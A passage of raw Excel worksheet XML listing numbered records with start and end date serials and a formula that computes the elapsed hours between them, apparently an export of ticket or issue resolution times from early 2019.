    <row r="880" spans="1:8" hidden="1">
      <c r="A880" t="s">
        <v>2730</v>
      </c>
      <c r="B880">
        <v>12714</v>
      </c>
      <c r="C880" t="s">
        <v>2731</v>
      </c>
      <c r="D880" t="s">
        <v>7</v>
      </c>
      <c r="E880" s="1">
        <v>43475.628310185188</v>
      </c>
      <c r="F880" s="1">
        <v>43586.081886574073</v>
      </c>
      <c r="G880" t="s">
        <v>1754</v>
      </c>
      <c r="H880" t="str">
        <f>TEXT(F880-E880,"[h]")</f>
        <v>2650</v>
      </c>
    </row>
    <row r="881" spans="1:8">
      <c r="A881" t="s">
        <v>2604</v>
      </c>
      <c r="B881">
        <v>12713</v>
      </c>
      <c r="C881" t="s">
        <v>2605</v>
      </c>
      <c r="D881" t="s">
        <v>7</v>
      </c>
      <c r="E881" s="1">
        <v>43475.434641203705</v>
      </c>
      <c r="F881" s="1">
        <v>43475.803414351853</v>
      </c>
      <c r="G881" t="s">
        <v>1309</v>
      </c>
      <c r="H881" t="str">
        <f>TEXT(F881-E881,"[h]")</f>
        <v>8</v>
      </c>
    </row>
    <row r="882" spans="1:8" hidden="1">
      <c r="A882" t="s">
        <v>2732</v>
      </c>
      <c r="B882">
        <v>12711</v>
      </c>
      <c r="C882" t="s">
        <v>2733</v>
      </c>
      <c r="D882" t="s">
        <v>7</v>
      </c>
      <c r="E882" s="1">
        <v>43475.158842592595</v>
      </c>
      <c r="F882" s="1">
        <v>43475.803414351853</v>
      </c>
      <c r="G882" t="s">
        <v>75</v>
      </c>
      <c r="H882" t="str">
        <f>TEXT(F882-E882,"[h]")</f>
        <v>15</v>
      </c>
    </row>
    <row r="883" spans="1:8" hidden="1">
      <c r="A883" t="s">
        <v>2734</v>
      </c>
      <c r="B883">
        <v>12710</v>
      </c>
      <c r="C883" t="s">
        <v>2735</v>
      </c>
      <c r="D883" t="s">
        <v>7</v>
      </c>
      <c r="E883" s="1">
        <v>43474.995983796296</v>
      </c>
      <c r="F883" s="1">
        <v>43475.086423611108</v>
      </c>
      <c r="G883" t="s">
        <v>716</v>
      </c>
      <c r="H883" t="str">
        <f>TEXT(F883-E883,"[h]")</f>
        <v>2</v>
      </c>
    </row>
    <row r="884" spans="1:8" hidden="1">
      <c r="A884" t="s">
        <v>2736</v>
      </c>
      <c r="B884">
        <v>12709</v>
      </c>
      <c r="C884" t="s">
        <v>2737</v>
      </c>
      <c r="D884" t="s">
        <v>7</v>
      </c>
      <c r="E884" s="1">
        <v>43474.958078703705</v>
      </c>
      <c r="F884" s="1">
        <v>43475.561331018522</v>
      </c>
      <c r="G884" t="s">
        <v>55</v>
      </c>
      <c r="H884" t="str">
        <f>TEXT(F884-E884,"[h]")</f>
        <v>14</v>
      </c>
    </row>
    <row r="885" spans="1:8" hidden="1">
      <c r="A885" t="s">
        <v>2746</v>
      </c>
      <c r="B885">
        <v>12704</v>
      </c>
      <c r="C885" t="s">
        <v>2747</v>
      </c>
      <c r="D885" t="s">
        <v>7</v>
      </c>
      <c r="E885" s="1">
        <v>43474.778703703705</v>
      </c>
      <c r="F885" s="1">
        <v>43474.798506944448</v>
      </c>
      <c r="G885" t="s">
        <v>55</v>
      </c>
      <c r="H885" t="str">
        <f>TEXT(F885-E885,"[h]")</f>
        <v>0</v>
      </c>
    </row>
    <row r="886" spans="1:8" hidden="1">
      <c r="A886" t="s">
        <v>2748</v>
      </c>
      <c r="B886">
        <v>12702</v>
      </c>
      <c r="C886" t="s">
        <v>2749</v>
      </c>
      <c r="D886" t="s">
        <v>7</v>
      </c>
      <c r="E886" s="1">
        <v>43474.498865740738</v>
      </c>
      <c r="F886" s="1">
        <v>43475.709097222221</v>
      </c>
      <c r="G886" t="s">
        <v>1939</v>
      </c>
      <c r="H886" t="str">
        <f>TEXT(F886-E886,"[h]")</f>
        <v>29</v>
      </c>
    </row>
    <row r="887" spans="1:8" hidden="1">
      <c r="A887" t="s">
        <v>2750</v>
      </c>
      <c r="B887">
        <v>12700</v>
      </c>
      <c r="C887" t="s">
        <v>2751</v>
      </c>
      <c r="D887" t="s">
        <v>7</v>
      </c>
      <c r="E887" s="1">
        <v>43474.341423611113</v>
      </c>
      <c r="F887" s="1">
        <v>43478.340243055558</v>
      </c>
      <c r="G887" t="s">
        <v>1917</v>
      </c>
      <c r="H887" t="str">
        <f>TEXT(F887-E887,"[h]")</f>
        <v>95</v>
      </c>
    </row>
    <row r="888" spans="1:8" hidden="1">
      <c r="A888" t="s">
        <v>2752</v>
      </c>
      <c r="B888">
        <v>12698</v>
      </c>
      <c r="C888" t="s">
        <v>2753</v>
      </c>
      <c r="D888" t="s">
        <v>7</v>
      </c>
      <c r="E888" s="1">
        <v>43473.846226851849</v>
      </c>
      <c r="F888" s="1">
        <v>43473.985011574077</v>
      </c>
      <c r="G888" t="s">
        <v>255</v>
      </c>
      <c r="H888" t="str">
        <f>TEXT(F888-E888,"[h]")</f>
        <v>3</v>
      </c>
    </row>
    <row r="889" spans="1:8">
      <c r="A889" t="s">
        <v>2642</v>
      </c>
      <c r="B889">
        <v>12696</v>
      </c>
      <c r="C889" t="s">
        <v>2643</v>
      </c>
      <c r="D889" t="s">
        <v>7</v>
      </c>
      <c r="E889" s="1">
        <v>43473.697500000002</v>
      </c>
      <c r="F889" s="1">
        <v>43475.71702546296</v>
      </c>
      <c r="G889" t="s">
        <v>16</v>
      </c>
      <c r="H889" t="str">
        <f>TEXT(F889-E889,"[h]")</f>
        <v>48</v>
      </c>
    </row>
    <row r="890" spans="1:8" hidden="1">
      <c r="A890" t="s">
        <v>2754</v>
      </c>
      <c r="B890">
        <v>12694</v>
      </c>
      <c r="C890" t="s">
        <v>2755</v>
      </c>
      <c r="D890" t="s">
        <v>7</v>
      </c>
      <c r="E890" s="1">
        <v>43473.320844907408</v>
      </c>
      <c r="F890" s="1">
        <v>43473.340092592596</v>
      </c>
      <c r="G890" t="s">
        <v>2756</v>
      </c>
      <c r="H890" t="str">
        <f>TEXT(F890-E890,"[h]")</f>
        <v>0</v>
      </c>
    </row>
    <row r="891" spans="1:8" hidden="1">
      <c r="A891" t="s">
        <v>2757</v>
      </c>
      <c r="B891">
        <v>12693</v>
      </c>
      <c r="C891" t="s">
        <v>2758</v>
      </c>
      <c r="D891" t="s">
        <v>7</v>
      </c>
      <c r="E891" s="1">
        <v>43473.29378472222</v>
      </c>
      <c r="F891" s="1">
        <v>43478.342002314814</v>
      </c>
      <c r="G891" t="s">
        <v>2200</v>
      </c>
      <c r="H891" t="str">
        <f>TEXT(F891-E891,"[h]")</f>
        <v>121</v>
      </c>
    </row>
    <row r="892" spans="1:8" hidden="1">
      <c r="A892" t="s">
        <v>2759</v>
      </c>
      <c r="B892">
        <v>12690</v>
      </c>
      <c r="C892" t="s">
        <v>2760</v>
      </c>
      <c r="D892" t="s">
        <v>7</v>
      </c>
      <c r="E892" s="1">
        <v>43472.8987037037</v>
      </c>
      <c r="F892" s="1">
        <v>43483.949525462966</v>
      </c>
      <c r="G892" t="s">
        <v>258</v>
      </c>
      <c r="H892" t="str">
        <f>TEXT(F892-E892,"[h]")</f>
        <v>265</v>
      </c>
    </row>
    <row r="893" spans="1:8">
      <c r="A893" t="s">
        <v>2761</v>
      </c>
      <c r="B893">
        <v>12689</v>
      </c>
      <c r="C893" t="s">
        <v>2762</v>
      </c>
      <c r="D893" t="s">
        <v>7</v>
      </c>
      <c r="E893" s="1">
        <v>43472.871342592596</v>
      </c>
      <c r="F893" s="1">
        <v>43758.142245370371</v>
      </c>
      <c r="G893" t="s">
        <v>214</v>
      </c>
      <c r="H893" t="str">
        <f>TEXT(F893-E893,"[h]")</f>
        <v>6846</v>
      </c>
    </row>
    <row r="894" spans="1:8" hidden="1">
      <c r="A894" t="s">
        <v>2763</v>
      </c>
      <c r="B894">
        <v>12688</v>
      </c>
      <c r="C894" t="s">
        <v>2764</v>
      </c>
      <c r="D894" t="s">
        <v>7</v>
      </c>
      <c r="E894" s="1">
        <v>43472.86142361111</v>
      </c>
      <c r="F894" s="1">
        <v>43695.661261574074</v>
      </c>
      <c r="G894" t="s">
        <v>55</v>
      </c>
      <c r="H894" t="str">
        <f>TEXT(F894-E894,"[h]")</f>
        <v>5347</v>
      </c>
    </row>
    <row r="895" spans="1:8">
      <c r="A895" t="s">
        <v>2744</v>
      </c>
      <c r="B895">
        <v>12687</v>
      </c>
      <c r="C895" t="s">
        <v>2745</v>
      </c>
      <c r="D895" t="s">
        <v>7</v>
      </c>
      <c r="E895" s="1">
        <v>43472.822025462963</v>
      </c>
      <c r="F895" s="1">
        <v>43472.944490740738</v>
      </c>
      <c r="G895" t="s">
        <v>1044</v>
      </c>
      <c r="H895" t="str">
        <f>TEXT(F895-E895,"[h]")</f>
        <v>2</v>
      </c>
    </row>
    <row r="896" spans="1:8">
      <c r="A896" t="s">
        <v>2765</v>
      </c>
      <c r="B896">
        <v>12685</v>
      </c>
      <c r="C896" t="s">
        <v>2766</v>
      </c>
      <c r="D896" t="s">
        <v>7</v>
      </c>
      <c r="E896" s="1">
        <v>43472.631145833337</v>
      </c>
      <c r="F896" s="1">
        <v>43473.812314814815</v>
      </c>
      <c r="G896" t="s">
        <v>1280</v>
      </c>
      <c r="H896" t="str">
        <f>TEXT(F896-E896,"[h]")</f>
        <v>28</v>
      </c>
    </row>
    <row r="897" spans="1:8" hidden="1">
      <c r="A897" t="s">
        <v>2767</v>
      </c>
      <c r="B897">
        <v>12684</v>
      </c>
      <c r="C897" t="s">
        <v>2768</v>
      </c>
      <c r="D897" t="s">
        <v>7</v>
      </c>
      <c r="E897" s="1">
        <v>43472.402997685182</v>
      </c>
      <c r="F897" s="1">
        <v>43474.381041666667</v>
      </c>
      <c r="G897" t="s">
        <v>2769</v>
      </c>
      <c r="H897" t="str">
        <f>TEXT(F897-E897,"[h]")</f>
        <v>47</v>
      </c>
    </row>
    <row r="898" spans="1:8">
      <c r="A898" t="s">
        <v>2770</v>
      </c>
      <c r="B898">
        <v>12683</v>
      </c>
      <c r="C898" t="s">
        <v>2771</v>
      </c>
      <c r="D898" t="s">
        <v>7</v>
      </c>
      <c r="E898" s="1">
        <v>43472.071342592593</v>
      </c>
      <c r="F898" s="1">
        <v>43486.277662037035</v>
      </c>
      <c r="G898" t="s">
        <v>2772</v>
      </c>
      <c r="H898" t="str">
        <f>TEXT(F898-E898,"[h]")</f>
        <v>340</v>
      </c>
    </row>
    <row r="899" spans="1:8">
      <c r="A899" t="s">
        <v>2773</v>
      </c>
      <c r="B899">
        <v>12682</v>
      </c>
      <c r="C899" t="s">
        <v>2774</v>
      </c>
      <c r="D899" t="s">
        <v>7</v>
      </c>
      <c r="E899" s="1">
        <v>43472.027719907404</v>
      </c>
      <c r="F899" s="1">
        <v>43474.381041666667</v>
      </c>
      <c r="G899" t="s">
        <v>2775</v>
      </c>
      <c r="H899" t="str">
        <f>TEXT(F899-E899,"[h]")</f>
        <v>56</v>
      </c>
    </row>
    <row r="900" spans="1:8">
      <c r="A900" t="s">
        <v>2646</v>
      </c>
      <c r="B900">
        <v>12680</v>
      </c>
      <c r="C900" t="s">
        <v>2647</v>
      </c>
      <c r="D900" t="s">
        <v>7</v>
      </c>
      <c r="E900" s="1">
        <v>43471.797222222223</v>
      </c>
      <c r="F900" s="1">
        <v>43472.354895833334</v>
      </c>
      <c r="G900" t="s">
        <v>16</v>
      </c>
      <c r="H900" t="str">
        <f>TEXT(F900-E900,"[h]")</f>
        <v>13</v>
      </c>
    </row>
    <row r="901" spans="1:8" hidden="1">
      <c r="A901" t="s">
        <v>2776</v>
      </c>
      <c r="B901">
        <v>12679</v>
      </c>
      <c r="C901" t="s">
        <v>2777</v>
      </c>
      <c r="D901" t="s">
        <v>7</v>
      </c>
      <c r="E901" s="1">
        <v>43471.505798611113</v>
      </c>
      <c r="F901" s="1">
        <v>43474.40425925926</v>
      </c>
      <c r="G901" t="s">
        <v>258</v>
      </c>
      <c r="H901" t="str">
        <f>TEXT(F901-E901,"[h]")</f>
        <v>69</v>
      </c>
    </row>
    <row r="902" spans="1:8" hidden="1">
      <c r="A902" t="s">
        <v>2778</v>
      </c>
      <c r="B902">
        <v>12678</v>
      </c>
      <c r="C902" t="s">
        <v>2779</v>
      </c>
      <c r="D902" t="s">
        <v>7</v>
      </c>
      <c r="E902" s="1">
        <v>43471.083310185182</v>
      </c>
      <c r="F902" s="1">
        <v>43582.036851851852</v>
      </c>
      <c r="G902" t="s">
        <v>2780</v>
      </c>
      <c r="H902" t="str">
        <f>TEXT(F902-E902,"[h]")</f>
        <v>2662</v>
      </c>
    </row>
    <row r="903" spans="1:8" hidden="1">
      <c r="A903" t="s">
        <v>2742</v>
      </c>
      <c r="B903">
        <v>12677</v>
      </c>
      <c r="C903" t="s">
        <v>2743</v>
      </c>
      <c r="D903" t="s">
        <v>7</v>
      </c>
      <c r="E903" s="1">
        <v>43471.050740740742</v>
      </c>
      <c r="F903" s="1">
        <v>43473.774814814817</v>
      </c>
      <c r="G903" t="s">
        <v>28</v>
      </c>
      <c r="H903" t="str">
        <f>TEXT(F903-E903,"[h]")</f>
        <v>65</v>
      </c>
    </row>
    <row r="904" spans="1:8" hidden="1">
      <c r="A904" t="s">
        <v>2781</v>
      </c>
      <c r="B904">
        <v>12676</v>
      </c>
      <c r="C904" t="s">
        <v>2782</v>
      </c>
      <c r="D904" t="s">
        <v>7</v>
      </c>
      <c r="E904" s="1">
        <v>43471.02548611111</v>
      </c>
      <c r="F904" s="1">
        <v>43474.40425925926</v>
      </c>
      <c r="G904" t="s">
        <v>37</v>
      </c>
      <c r="H904" t="str">
        <f>TEXT(F904-E904,"[h]")</f>
        <v>81</v>
      </c>
    </row>
    <row r="905" spans="1:8">
      <c r="A905" t="s">
        <v>2783</v>
      </c>
      <c r="B905">
        <v>12675</v>
      </c>
      <c r="C905" t="s">
        <v>2784</v>
      </c>
      <c r="D905" t="s">
        <v>7</v>
      </c>
      <c r="E905" s="1">
        <v>43470.994664351849</v>
      </c>
      <c r="F905" s="1">
        <v>43473.243043981478</v>
      </c>
      <c r="G905" t="s">
        <v>25</v>
      </c>
      <c r="H905" t="str">
        <f>TEXT(F905-E905,"[h]")</f>
        <v>53</v>
      </c>
    </row>
    <row r="906" spans="1:8">
      <c r="A906" t="s">
        <v>2740</v>
      </c>
      <c r="B906">
        <v>12672</v>
      </c>
      <c r="C906" t="s">
        <v>2741</v>
      </c>
      <c r="D906" t="s">
        <v>7</v>
      </c>
      <c r="E906" s="1">
        <v>43470.853483796294</v>
      </c>
      <c r="F906" s="1">
        <v>43470.930520833332</v>
      </c>
      <c r="G906" t="s">
        <v>483</v>
      </c>
      <c r="H906" t="str">
        <f>TEXT(F906-E906,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="907" spans="1:8" hidden="1">
      <c r="A907" t="s">
        <v>2738</v>
      </c>
      <c r="B907">
        <v>12671</v>
      </c>
      <c r="C907" t="s">
        <v>2739</v>
      </c>
      <c r="D907" t="s">
        <v>7</v>
      </c>
      <c r="E907" s="1">
        <v>43470.763912037037</v>
      </c>
      <c r="F907" s="1">
        <v>43470.801319444443</v>
      </c>
      <c r="G907" t="s">
        <v>2631</v>
      </c>
      <c r="H907" t="str">
        <f>TEXT(F907-E907,"[h]")</f>
        <v>0</v>
      </c>
    </row>
    <row r="908" spans="1:8">
      <c r="A908" t="s">
        <v>2785</v>
      </c>
      <c r="B908">
        <v>12670</v>
      </c>
      <c r="C908" t="s">
        <v>2786</v>
      </c>
      <c r="D908" t="s">
        <v>7</v>
      </c>
      <c r="E908" s="1">
        <v>43470.723761574074</v>
      </c>
      <c r="F908" s="1">
        <v>43476.7190625</v>
      </c>
      <c r="G908" t="s">
        <v>16</v>
      </c>
      <c r="H908" t="str">
        <f>TEXT(F908-E908,"[h]")</f>
        <v>143</v>
      </c>
    </row>
    <row r="909" spans="1:8" hidden="1">
      <c r="A909" t="s">
        <v>2787</v>
      </c>
      <c r="B909">
        <v>12669</v>
      </c>
      <c r="C909" t="s">
        <v>2788</v>
      </c>
      <c r="D909" t="s">
        <v>7</v>
      </c>
      <c r="E909" s="1">
        <v>43470.722187500003</v>
      </c>
      <c r="F909" s="1">
        <v>43471.119513888887</v>
      </c>
      <c r="G909" t="s">
        <v>886</v>
      </c>
      <c r="H909" t="str">
        <f>TEXT(F909-E909,"[h]")</f>
        <v>9</v>
      </c>
    </row>
    <row r="910" spans="1:8" hidden="1">
      <c r="A910" t="s">
        <v>2789</v>
      </c>
      <c r="B910">
        <v>12668</v>
      </c>
      <c r="C910" t="s">
        <v>2790</v>
      </c>
      <c r="D910" t="s">
        <v>7</v>
      </c>
      <c r="E910" s="1">
        <v>43470.456111111111</v>
      </c>
      <c r="F910" s="1">
        <v>43475.227384259262</v>
      </c>
      <c r="G910" t="s">
        <v>37</v>
      </c>
      <c r="H910" t="str">
        <f>TEXT(F910-E910,"[h]")</f>
        <v>114</v>
      </c>
    </row>
    <row r="911" spans="1:8" hidden="1">
      <c r="A911" t="s">
        <v>2791</v>
      </c>
      <c r="B911">
        <v>12667</v>
      </c>
      <c r="C911" t="s">
        <v>2792</v>
      </c>
      <c r="D911" t="s">
        <v>7</v>
      </c>
      <c r="E911" s="1">
        <v>43470.072766203702</v>
      </c>
      <c r="F911" s="1">
        <v>43582.756365740737</v>
      </c>
      <c r="G911" t="s">
        <v>1095</v>
      </c>
      <c r="H911" t="str">
        <f>TEXT(F911-E911,"[h]")</f>
        <v>2704</v>
      </c>
    </row>
    <row r="912" spans="1:8" hidden="1">
      <c r="A912" t="s">
        <v>2793</v>
      </c>
      <c r="B912">
        <v>12666</v>
      </c>
      <c r="C912" t="s">
        <v>2794</v>
      </c>
      <c r="D912" t="s">
        <v>7</v>
      </c>
      <c r="E912" s="1">
        <v>43469.93378472222</v>
      </c>
      <c r="F912" s="1">
        <v>43472.028321759259</v>
      </c>
      <c r="G912" t="s">
        <v>2027</v>
      </c>
      <c r="H912" t="str">
        <f>TEXT(F912-E912,"[h]")</f>
        <v>50</v>
      </c>
    </row>
    <row r="913" spans="1:8" hidden="1">
      <c r="A913" t="s">
        <v>2795</v>
      </c>
      <c r="B913">
        <v>12665</v>
      </c>
      <c r="C913" t="s">
        <v>2796</v>
      </c>
      <c r="D913" t="s">
        <v>7</v>
      </c>
      <c r="E913" s="1">
        <v>43469.874259259261</v>
      </c>
      <c r="F913" s="1">
        <v>43478.356770833336</v>
      </c>
      <c r="G913" t="s">
        <v>2200</v>
      </c>
      <c r="H913" t="str">
        <f>TEXT(F913-E913,"[h]")</f>
        <v>203</v>
      </c>
    </row>
    <row r="914" spans="1:8">
      <c r="A914" t="s">
        <v>2797</v>
      </c>
      <c r="B914">
        <v>12663</v>
      </c>
      <c r="C914" t="s">
        <v>2798</v>
      </c>
      <c r="D914" t="s">
        <v>7</v>
      </c>
      <c r="E914" s="1">
        <v>43469.750891203701</v>
      </c>
      <c r="F914" s="1">
        <v>43473.812314814815</v>
      </c>
      <c r="G914" t="s">
        <v>1280</v>
      </c>
      <c r="H914" t="str">
        <f>TEXT(F914-E914,"[h]")</f>
        <v>97</v>
      </c>
    </row>
    <row r="915" spans="1:8" hidden="1">
      <c r="A915" t="s">
        <v>2799</v>
      </c>
      <c r="B915">
        <v>12662</v>
      </c>
      <c r="C915" t="s">
        <v>2800</v>
      </c>
      <c r="D915" t="s">
        <v>7</v>
      </c>
      <c r="E915" s="1">
        <v>43469.633761574078</v>
      </c>
      <c r="F915" s="1">
        <v>43631.091180555559</v>
      </c>
      <c r="G915" t="s">
        <v>290</v>
      </c>
      <c r="H915" t="str">
        <f>TEXT(F915-E915,"[h]")</f>
        <v>3874</v>
      </c>
    </row>
    <row r="916" spans="1:8" hidden="1">
      <c r="A916" t="s">
        <v>2801</v>
      </c>
      <c r="B916">
        <v>12660</v>
      </c>
      <c r="C916" t="s">
        <v>2802</v>
      </c>
      <c r="D916" t="s">
        <v>7</v>
      </c>
      <c r="E916" s="1">
        <v>43469.390011574076</v>
      </c>
      <c r="F916" s="1">
        <v>43696.487905092596</v>
      </c>
      <c r="G916" t="s">
        <v>831</v>
      </c>
      <c r="H916" t="str">
        <f>TEXT(F916-E916,"[h]")</f>
        <v>5450</v>
      </c>
    </row>
    <row r="917" spans="1:8" hidden="1">
      <c r="A917" t="s">
        <v>2803</v>
      </c>
      <c r="B917">
        <v>12659</v>
      </c>
      <c r="C917" t="s">
        <v>2804</v>
      </c>
      <c r="D917" t="s">
        <v>7</v>
      </c>
      <c r="E917" s="1">
        <v>43468.926817129628</v>
      </c>
      <c r="F917" s="1">
        <v>43528.162766203706</v>
      </c>
      <c r="G917" t="s">
        <v>2054</v>
      </c>
      <c r="H917" t="str">
        <f>TEXT(F917-E917,"[h]")</f>
        <v>1421</v>
      </c>
    </row>
    <row r="918" spans="1:8" hidden="1">
      <c r="A918" t="s">
        <v>2811</v>
      </c>
      <c r="B918">
        <v>12654</v>
      </c>
      <c r="C918" t="s">
        <v>2812</v>
      </c>
      <c r="D918" t="s">
        <v>7</v>
      </c>
      <c r="E918" s="1">
        <v>43468.637743055559</v>
      </c>
      <c r="F918" s="1">
        <v>43469.550046296295</v>
      </c>
      <c r="G918" t="s">
        <v>1757</v>
      </c>
      <c r="H918" t="str">
        <f>TEXT(F918-E918,"[h]")</f>
        <v>21</v>
      </c>
    </row>
    <row r="919" spans="1:8">
      <c r="A919" t="s">
        <v>2813</v>
      </c>
      <c r="B919">
        <v>12653</v>
      </c>
      <c r="C919" t="s">
        <v>2814</v>
      </c>
      <c r="D919" t="s">
        <v>7</v>
      </c>
      <c r="E919" s="1">
        <v>43468.636655092596</v>
      </c>
      <c r="F919" s="1">
        <v>43567.762418981481</v>
      </c>
      <c r="G919" t="s">
        <v>25</v>
      </c>
      <c r="H919" t="str">
        <f>TEXT(F919-E919,"[h]")</f>
        <v>2379</v>
      </c>
    </row>
    <row r="920" spans="1:8" hidden="1">
      <c r="A920" t="s">
        <v>2815</v>
      </c>
      <c r="B920">
        <v>12651</v>
      </c>
      <c r="C920" t="s">
        <v>2816</v>
      </c>
      <c r="D920" t="s">
        <v>7</v>
      </c>
      <c r="E920" s="1">
        <v>43467.816192129627</v>
      </c>
      <c r="F920" s="1">
        <v>43467.876747685186</v>
      </c>
      <c r="G920" t="s">
        <v>51</v>
      </c>
      <c r="H920" t="str">
        <f>TEXT(F920-E920,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="921" spans="1:8">
      <c r="A921" t="s">
        <v>2648</v>
      </c>
      <c r="B921">
        <v>12650</v>
      </c>
      <c r="C921" t="s">
        <v>2649</v>
      </c>
      <c r="D921" t="s">
        <v>7</v>
      </c>
      <c r="E921" s="1">
        <v>43467.638159722221</v>
      </c>
      <c r="F921" s="1">
        <v>43480.217673611114</v>
      </c>
      <c r="G921" t="s">
        <v>16</v>
      </c>
      <c r="H921" t="str">
        <f>TEXT(F921-E921,"[h]")</f>
        <v>301</v>
      </c>
    </row>
    <row r="922" spans="1:8" hidden="1">
      <c r="A922" t="s">
        <v>2817</v>
      </c>
      <c r="B922">
        <v>12648</v>
      </c>
      <c r="C922" t="s">
        <v>2818</v>
      </c>
      <c r="D922" t="s">
        <v>7</v>
      </c>
      <c r="E922" s="1">
        <v>43467.563263888886</v>
      </c>
      <c r="F922" s="1">
        <v>43467.664178240739</v>
      </c>
      <c r="G922" t="s">
        <v>1757</v>
      </c>
      <c r="H922" t="str">
        <f>TEXT(F922-E922,"[h]")</f>
        <v>2</v>
      </c>
    </row>
    <row r="923" spans="1:8" hidden="1">
      <c r="A923" t="s">
        <v>2819</v>
      </c>
      <c r="B923">
        <v>12647</v>
      </c>
      <c r="C923" t="s">
        <v>2820</v>
      </c>
      <c r="D923" t="s">
        <v>7</v>
      </c>
      <c r="E923" s="1">
        <v>43467.389537037037</v>
      </c>
      <c r="F923" s="1">
        <v>43480.220613425925</v>
      </c>
      <c r="G923" t="s">
        <v>2821</v>
      </c>
      <c r="H923" t="str">
        <f>TEXT(F923-E923,"[h]")</f>
        <v>307</v>
      </c>
    </row>
    <row r="924" spans="1:8" hidden="1">
      <c r="A924" t="s">
        <v>1772</v>
      </c>
      <c r="B924">
        <v>12645</v>
      </c>
      <c r="C924" t="s">
        <v>2822</v>
      </c>
      <c r="D924" t="s">
        <v>7</v>
      </c>
      <c r="E924" s="1">
        <v>43467.225497685184</v>
      </c>
      <c r="F924" s="1">
        <v>43467.225914351853</v>
      </c>
      <c r="G924" t="s">
        <v>66</v>
      </c>
      <c r="H924" t="str">
        <f>TEXT(F924-E924,"[h]")</f>
        <v>0</v>
      </c>
    </row>
    <row r="925" spans="1:8" hidden="1">
      <c r="A925" t="s">
        <v>2823</v>
      </c>
      <c r="B925">
        <v>12644</v>
      </c>
      <c r="C925" t="s">
        <v>2824</v>
      </c>
      <c r="D925" t="s">
        <v>7</v>
      </c>
      <c r="E925" s="1">
        <v>43467.192800925928</v>
      </c>
      <c r="F925" s="1">
        <v>43469.360289351855</v>
      </c>
      <c r="G925" t="s">
        <v>1917</v>
      </c>
      <c r="H925" t="str">
        <f>TEXT(F925-E925,"[h]")</f>
        <v>52</v>
      </c>
    </row>
    <row r="926" spans="1:8" hidden="1">
      <c r="A926" t="s">
        <v>2825</v>
      </c>
      <c r="B926">
        <v>12642</v>
      </c>
      <c r="C926" t="s">
        <v>2826</v>
      </c>
      <c r="D926" t="s">
        <v>7</v>
      </c>
      <c r="E926" s="1">
        <v>43466.944131944445</v>
      </c>
      <c r="F926" s="1">
        <v>43467.456863425927</v>
      </c>
      <c r="G926" t="s">
        <v>852</v>
      </c>
      <c r="H926" t="str">
        <f>TEXT(F926-E926,"[h]")</f>
        <v>12</v>
      </c>
    </row>
    <row r="927" spans="1:8" hidden="1">
      <c r="A927" t="s">
        <v>2805</v>
      </c>
      <c r="B927">
        <v>12641</v>
      </c>
      <c r="C927" t="s">
        <v>2806</v>
      </c>
      <c r="D927" t="s">
        <v>7</v>
      </c>
      <c r="E927" s="1">
        <v>43466.854259259257</v>
      </c>
      <c r="F927" s="1">
        <v>43466.867905092593</v>
      </c>
      <c r="G927" t="s">
        <v>90</v>
      </c>
      <c r="H927" t="str">
        <f>TEXT(F927-E927,"[h]")</f>
        <v>0</v>
      </c>
    </row>
    <row r="928" spans="1:8" hidden="1">
      <c r="A928" t="s">
        <v>2827</v>
      </c>
      <c r="B928">
        <v>12640</v>
      </c>
      <c r="C928" t="s">
        <v>2828</v>
      </c>
      <c r="D928" t="s">
        <v>7</v>
      </c>
      <c r="E928" s="1">
        <v>43466.806516203702</v>
      </c>
      <c r="F928" s="1">
        <v>43467.193912037037</v>
      </c>
      <c r="G928" t="s">
        <v>2829</v>
      </c>
      <c r="H928" t="str">
        <f>TEXT(F928-E928,"[h]")</f>
        <v>9</v>
      </c>
    </row>
    <row r="929" spans="1:8">
      <c r="A929" t="s">
        <v>2807</v>
      </c>
      <c r="B929">
        <v>12639</v>
      </c>
      <c r="C929" t="s">
        <v>2808</v>
      </c>
      <c r="D929" t="s">
        <v>7</v>
      </c>
      <c r="E929" s="1">
        <v>43466.531018518515</v>
      </c>
      <c r="F929" s="1">
        <v>43466.621712962966</v>
      </c>
      <c r="G929" t="s">
        <v>2141</v>
      </c>
      <c r="H929" t="str">
        <f>TEXT(F929-E929,"[h]")</f>
        <v>2</v>
      </c>
    </row>
    <row r="930" spans="1:8">
      <c r="A930" t="s">
        <v>2830</v>
      </c>
      <c r="B930">
        <v>12637</v>
      </c>
      <c r="C930" t="s">
        <v>2831</v>
      </c>
      <c r="D930" t="s">
        <v>7</v>
      </c>
      <c r="E930" s="1">
        <v>43466.345000000001</v>
      </c>
      <c r="F930" s="1">
        <v>43468.317719907405</v>
      </c>
      <c r="G930" t="s">
        <v>16</v>
      </c>
      <c r="H930" t="str">
        <f>TEXT(F930-E930,"[h]")</f>
        <v>47</v>
      </c>
    </row>
    <row r="931" spans="1:8" hidden="1">
      <c r="A931" t="s">
        <v>2832</v>
      </c>
      <c r="B931">
        <v>12635</v>
      </c>
      <c r="C931" t="s">
        <v>2833</v>
      </c>
      <c r="D931" t="s">
        <v>7</v>
      </c>
      <c r="E931" s="1">
        <v>43465.140277777777</v>
      </c>
      <c r="F931" s="1">
        <v>43467.193530092591</v>
      </c>
      <c r="G931" t="s">
        <v>2829</v>
      </c>
      <c r="H931" t="str">
        <f>TEXT(F931-E931,"[h]")</f>
        <v>49</v>
      </c>
    </row>
    <row r="932" spans="1:8" hidden="1">
      <c r="A932" t="s">
        <v>2834</v>
      </c>
      <c r="B932">
        <v>12634</v>
      </c>
      <c r="C932" t="s">
        <v>2835</v>
      </c>
      <c r="D932" t="s">
        <v>7</v>
      </c>
      <c r="E932" s="1">
        <v>43465.101585648146</v>
      </c>
      <c r="F932" s="1">
        <v>43467.914814814816</v>
      </c>
      <c r="G932" t="s">
        <v>852</v>
      </c>
      <c r="H932" t="str">
        <f>TEXT(F932-E932,"[h]")</f>
        <v>67</v>
      </c>
    </row>
    <row r="933" spans="1:8">
      <c r="A933" t="s">
        <v>2836</v>
      </c>
      <c r="B933">
        <v>12633</v>
      </c>
      <c r="C933" t="s">
        <v>2837</v>
      </c>
      <c r="D933" t="s">
        <v>7</v>
      </c>
      <c r="E933" s="1">
        <v>43465.027615740742</v>
      </c>
      <c r="F933" s="1">
        <v>43753.732800925929</v>
      </c>
      <c r="G933" t="s">
        <v>2838</v>
      </c>
      <c r="H933" t="str">
        <f>TEXT(F933-E933,"[h]")</f>
        <v>6928</v>
      </c>
    </row>
    <row r="934" spans="1:8">
      <c r="A934" t="s">
        <v>2839</v>
      </c>
      <c r="B934">
        <v>12632</v>
      </c>
      <c r="C934" t="s">
        <v>2840</v>
      </c>
      <c r="D934" t="s">
